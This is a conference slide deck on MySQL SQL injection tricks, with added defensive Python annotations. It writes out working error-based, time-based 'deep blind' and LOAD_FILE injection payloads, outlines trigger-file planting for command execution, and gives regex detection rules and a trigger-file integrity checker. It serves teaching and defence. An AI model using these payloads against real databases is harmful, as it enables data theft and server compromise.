On the Clever Tricks of SQL Injection (關於SQL Injection的那些奇技淫巧)
              Orange@chroot.org
SQL Injection ?
•   Havij
•   Pangolin
•   DSQL tool
•   NBSI / HBSI
•   BSQL Hacker
•   Domain tools
•   SQLmap etc……
This talk is about MySQL !
MySQL Injection (Maybe you know)
• Get data
  – Blind Injection
     • True and False
     • Time base
     • Deep Blind Injection
  – Union Injection
  – Error Base Injection
• Read / Write
  – Load_file
  – Into outfile
• Others
  – Information_schema
  – User-defined function
  – Trigger
MySQL Injection (Maybe you know more.)
MySQL Development History

  Feature                            MySQL Series
  Unions                             4.0
  Subqueries                         4.1
  R-trees                            4.1 (for the MyISAM storage engine)
  Stored procedures and functions    5.0
  Views                              5.0
  Cursors                            5.0
  XA transactions                    5.0
  Triggers                           5.0 and 5.1
  Event scheduler                    5.1
  Partitioning                       5.1
  Pluggable storage engine API       5.1
  Plugin API                         5.1
  InnoDB Plugin                      5.1
  Row-based replication              5.1
  Server log tables                  5.1
MySQL (1/3)
Error Base Injection
• Like injection in SQL Server
• When to use?
  – Insert injection
  – Update injection
  – The same parameter is used in queries against several tables
  – The query's result is never displayed on the page
• How to implement?
  – Duplicate Error
  – Function Error
Select * from (Select 1,1) as x
     Duplicate column name '1'

Select * from (select * from user as a join user as b) as x
     Duplicate column name 'Host'

Select * from (select * from user as a join user as b using(Host)) as x
     Duplicate column name 'User'

Select * from (Select user(),user()) as x
     Will show user name? No:
     Duplicate column name 'user()'
NAME_CONST(name, value)
Causes the column to have the given name.

Select NAME_CONST('a',1), NAME_CONST('b',2)

  a    b
  1    2

Select * from (Select NAME_CONST(user(),1), NAME_CONST(user(),1)) as x
MySQL patched it
• MySQL > 5.1
  – NAME_CONST() can no longer be used this way.
  – Its arguments must be constants.
• select * from (select count(*),
      concat((select (select user()) from information_schema.tables limit 0,1),
             floor(rand(0)*2)) as x
    from information_schema.tables group by x) as a

• ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
What is Duplicate Entry Error?
SELECT *
FROM (
       SELECT COUNT(*), CONCAT(USER(), FLOOR(RAND()*2))
       FROM mysql.user
       GROUP BY 2
) AS a

• ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
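Why that GROUP BY raises a duplicate-entry error is worth spelling out, because the defence follows from it: the leak only works when the application echoes the raw MySQL error to the client. The following Python model is an added illustration, not code from the slides. It imitates how MySQL resolves GROUP BY through a temporary table keyed on the group expression: the key is computed once to look the group up and, if the group is new, computed a second time while the row is inserted. RAND() advances on every call, so the inserted key can differ from the looked-up key and a later row can collide with it. The FLOOR(RAND(0)*2) values are a constructed sample input (the commonly cited sequence for seed 0); only the first five matter here.

```python
"""Model of MySQL's GROUP BY temp-table behaviour for
SELECT COUNT(*), CONCAT(USER(), FLOOR(RAND(0)*2)) ... GROUP BY 2.
Added example; assumes the commonly cited FLOOR(RAND(0)*2) sequence."""
from typing import Dict, Iterator


class DuplicateEntryError(Exception):
    """Stands in for MySQL ERROR 1062 (23000)."""


def floor_rand0_times_2() -> Iterator[int]:
    # Deterministic FLOOR(RAND(0)*2) values for seed 0 (assumed sample sequence).
    yield from [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1]


def group_by_with_double_evaluation(source_rows: int, user: str,
                                    rand_bits: Iterator[int]) -> Dict[str, int]:
    """Return COUNT(*) per group, or raise DuplicateEntryError when the key
    computed during insertion already exists in the temporary table."""
    temp_table: Dict[str, int] = {}
    for _ in range(source_rows):
        # First evaluation of the group expression: used only for the lookup.
        lookup_key = f"{user}{next(rand_bits)}"
        if lookup_key in temp_table:
            temp_table[lookup_key] += 1
            continue
        # Second evaluation: RAND() is called again while the new row is stored.
        insert_key = f"{user}{next(rand_bits)}"
        if insert_key in temp_table:
            raise DuplicateEntryError(
                f"ERROR 1062 (23000): Duplicate entry '{insert_key}' for key 1")
        temp_table[insert_key] = 1
    return temp_table


def error_message_for(source_rows: int, user: str = "root@localhost") -> str:
    """Run the model over `source_rows` rows; return the error text or '' if none."""
    try:
        group_by_with_double_evaluation(source_rows, user, floor_rand0_times_2())
    except DuplicateEntryError as exc:
        return str(exc)
    return ""


if __name__ == "__main__":
    print(repr(error_message_for(1)))   # one row: a single group, no collision
    print(error_message_for(3))         # three rows: duplicate entry 'root@localhost1'
```

With the sample sequence the first row is looked up under key 0 but stored under key 1, the second row is found under key 1, and the third row is looked up under key 0 (absent) then stored under key 1 (present), which is the collision. Nothing about this requires the attacker to see data: the whole channel is the error string, so returning a generic error page instead of the driver's message closes it.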
Demo
MySQL (2/3)
Deep Blind Injection
• Status 200 or 500?
• Time-based: quick or slow?
• a -> 0x97
  – 9 -> delay 9 seconds
  – 7 -> delay 7 seconds
• So one character can be solved in two requests.
Deep Blind Injection (SQL Server)
DECLARE @x AS int;
DECLARE @w AS char(6);
-- {QUERY}, {POSITION} and {SECONDS} are template placeholders filled in by the tool
SET @x = ASCII(SUBSTRING(master.dbo.fn_varbintohexstr(CAST({QUERY} AS varbinary(8000))), {POSITION}, 1));
-- map the hex digit to 0..15: 'a'..'f' (ASCII 97..102) minus 87, '0'..'9' (ASCII 48..57) minus 48
IF @x >= 97 SET @x = @x - 87 ELSE SET @x = @x - 48;
SET @w = '0:0:' + CAST(@x * {SECONDS} AS char);
WAITFOR DELAY @w
Deep Blind Injection (MySQL)
• if(
        ord(substring(hex(user()),1,1))>=97,
        sleep(ord(substring(hex(user()),1,1))-87),
        sleep(ord(substring(hex(user()),1,1))-48))

Implemented by BSQL Hacker
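Both the error-based payloads above and this hex-nibble SLEEP() encoding leave very recognisable strings in web-server access logs, which is the cheapest place to look for them after the fact. The scanner below is an added example, not part of the slides or of BSQL Hacker; it URL-decodes the request target of Apache/nginx combined-format lines and matches the primitives this deck covers (FLOOR(RAND(0)*2) with GROUP BY, NAME_CONST, SLEEP(ORD(SUBSTRING(HEX(...)))), WAITFOR DELAY, LOAD_FILE and INTO OUTFILE). The log lines are constructed for the demo and the rule labels are my own.

```python
"""Access-log scanner for the MySQL injection primitives discussed in the deck.
Added example with constructed sample log lines; rule labels are illustrative."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# label -> pattern, applied to the decoded, lower-cased, whitespace-collapsed target
RULES: Dict[str, "re.Pattern[str]"] = {
    "error_based_rand_groupby": re.compile(
        r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by"),
    "error_based_name_const":   re.compile(r"name_const\s*\("),
    "deep_blind_sleep_nibble":  re.compile(r"sleep\(\s*ord\(\s*substring\(\s*hex\("),
    "time_based_sleep":         re.compile(r"\bsleep\(\s*\d+\s*\)"),
    "mssql_waitfor_delay":      re.compile(r"waitfor\s+delay"),
    "file_read_load_file":      re.compile(r"load_file\s*\("),
    "file_write_into_outfile":  re.compile(r"into\s+(out|dump)file"),
}

# Combined log format; only the request target is needed here.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def normalise(target: str) -> str:
    """Percent-decode twice (double-encoded payloads), lower-case, collapse spaces."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", " ", decoded.lower())


def scan_line(line: str) -> Tuple[str, List[str]]:
    """Return (raw request target, matching rule labels) for one log line."""
    m = _LOG_RE.match(line)
    if not m:
        return "", []
    text = normalise(m.group("target"))
    hits = [label for label, pat in RULES.items() if pat.search(text)]
    return m.group("target"), hits


def scan_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Scan many lines; return (1-based line number, target, labels) for hits only."""
    findings = []
    for n, line in enumerate(lines, start=1):
        target, hits = scan_line(line)
        if hits:
            findings.append((n, target, hits))
    return findings


# Constructed sample: lines 2, 3 and 5 carry payload shapes shown on the slides.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=42 HTTP/1.1" 200 1043',
    '10.0.0.9 - - [10/Oct/2023:13:55:37 +0000] "GET /item.php?id=1%27%20and%20(select%201%20from%20'
    '(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)--%20- HTTP/1.1" 500 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:49 +0000] "GET /item.php?id=1%20and%20if(ord(substring(hex(user()),1,1))'
    '%3E=97,sleep(ord(substring(hex(user()),1,1))-87),sleep(ord(substring(hex(user()),1,1))-48)) HTTP/1.1" 200 1043',
    '10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "POST /login HTTP/1.1" 302 0',
    '10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /item.php?id=1%20union%20select%20load_file(%27/tmp/x%27),2 HTTP/1.1" 200 2201',
]

if __name__ == "__main__":
    for n, _target, labels in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(labels)}")
```

Two things to note when running this over real logs: the deep-blind payload returns status 200 and a normal-looking page, so the only log-side signal is the payload text itself plus the unusual response time, and a single source hitting several of these rules in sequence (error-based first, then timing) is the pattern worth alerting on rather than any one line.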
MySQL (3/3)
MySQL Triggers
A trigger is a named database object that is associated with a table, and that activates when a particular event occurs for the table.
When a trigger is created
• MySQL/data/database/
  – table_name.TRG
  – atk.TRN
• On update/delete/insert, MySQL checks the files above.
• Can we generate them ourselves?
How to Exploit it
• Update / Insert data?
• Add a MySQL account?
• Exploit it with UDF?
  – Causes the MySQL server to stop.
  – Maybe a security feature, or a bug.
• A SQL injection can run system commands!
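The flip side of "can we generate them ourselves?" is that a trigger written straight into the data directory never passes through CREATE TRIGGER, so the .TRG/.TRN files are the one place it must show up. The Python below is an added example, not from the slides: it inventories every .TRG and .TRN file under a MySQL 5.x-style data directory (<datadir>/<schema>/<table>.TRG, <trigger>.TRN, the layout the slide describes) with a SHA-256 per file and diffs that against a saved baseline, so a file that appeared or changed without a matching change request stands out. The directory tree, schema names and file contents are constructed in a temp dir for the demo. MySQL 8.0 keeps trigger metadata in its transactional data dictionary instead, so this check is for the 5.x layout.

```python
"""Baseline check for MySQL 5.x trigger files (.TRG / .TRN) under a data directory.
Added example; directory layout and contents below are constructed for the demo."""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

TRIGGER_SUFFIXES = (".TRG", ".TRN")


def inventory_trigger_files(datadir: str) -> Dict[str, str]:
    """Map '<schema>/<file>' -> sha256 hex digest for every .TRG/.TRN under datadir."""
    found: Dict[str, str] = {}
    for root, _dirs, files in os.walk(datadir):
        for name in files:
            if not name.upper().endswith(TRIGGER_SUFFIXES):
                continue
            path = os.path.join(root, name)
            rel = os.path.relpath(path, datadir).replace(os.sep, "/")
            with open(path, "rb") as fh:
                found[rel] = hashlib.sha256(fh.read()).hexdigest()
    return found


def diff_inventories(baseline: Dict[str, str],
                     current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify trigger files as added, changed or removed relative to the baseline."""
    return {
        "added":   sorted(k for k in current if k not in baseline),
        "changed": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "removed": sorted(k for k in baseline if k not in current),
    }


def _write(path: str, content: str) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)


def demo() -> Tuple[Dict[str, List[str]], int]:
    """Constructed scenario: a baseline with one legitimate trigger on app.orders,
    then one file rewritten and a new trigger (.TRG plus 'atk.TRN') appearing.
    Returns (diff report, number of trigger files in the current state)."""
    with tempfile.TemporaryDirectory() as datadir:
        # Known-good state. File bodies are placeholders, not real MySQL metadata.
        _write(os.path.join(datadir, "app", "orders.TRG"), "placeholder trigger definition\n")
        _write(os.path.join(datadir, "app", "orders_audit.TRN"), "placeholder trigger name\n")
        _write(os.path.join(datadir, "app", "orders.frm"), "not a trigger file\n")
        baseline = inventory_trigger_files(datadir)

        # Later state: orders.TRG modified, users.TRG and atk.TRN newly present.
        _write(os.path.join(datadir, "app", "orders.TRG"), "placeholder trigger definition, modified\n")
        _write(os.path.join(datadir, "app", "users.TRG"), "placeholder trigger definition\n")
        _write(os.path.join(datadir, "app", "atk.TRN"), "placeholder trigger name\n")
        current = inventory_trigger_files(datadir)
        return diff_inventories(baseline, current), len(current)


if __name__ == "__main__":
    report, total = demo()
    print(f"{total} trigger files; added={report['added']} "
          f"changed={report['changed']} removed={report['removed']}")
```

In practice the baseline dictionary would be persisted (and itself protected) after each approved schema change, and the inventory compared against the output of SHOW TRIGGERS as well: a .TRG file the server does not report, or vice versa, is the inconsistency the slides are hinting at.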
Demo
Thanks : )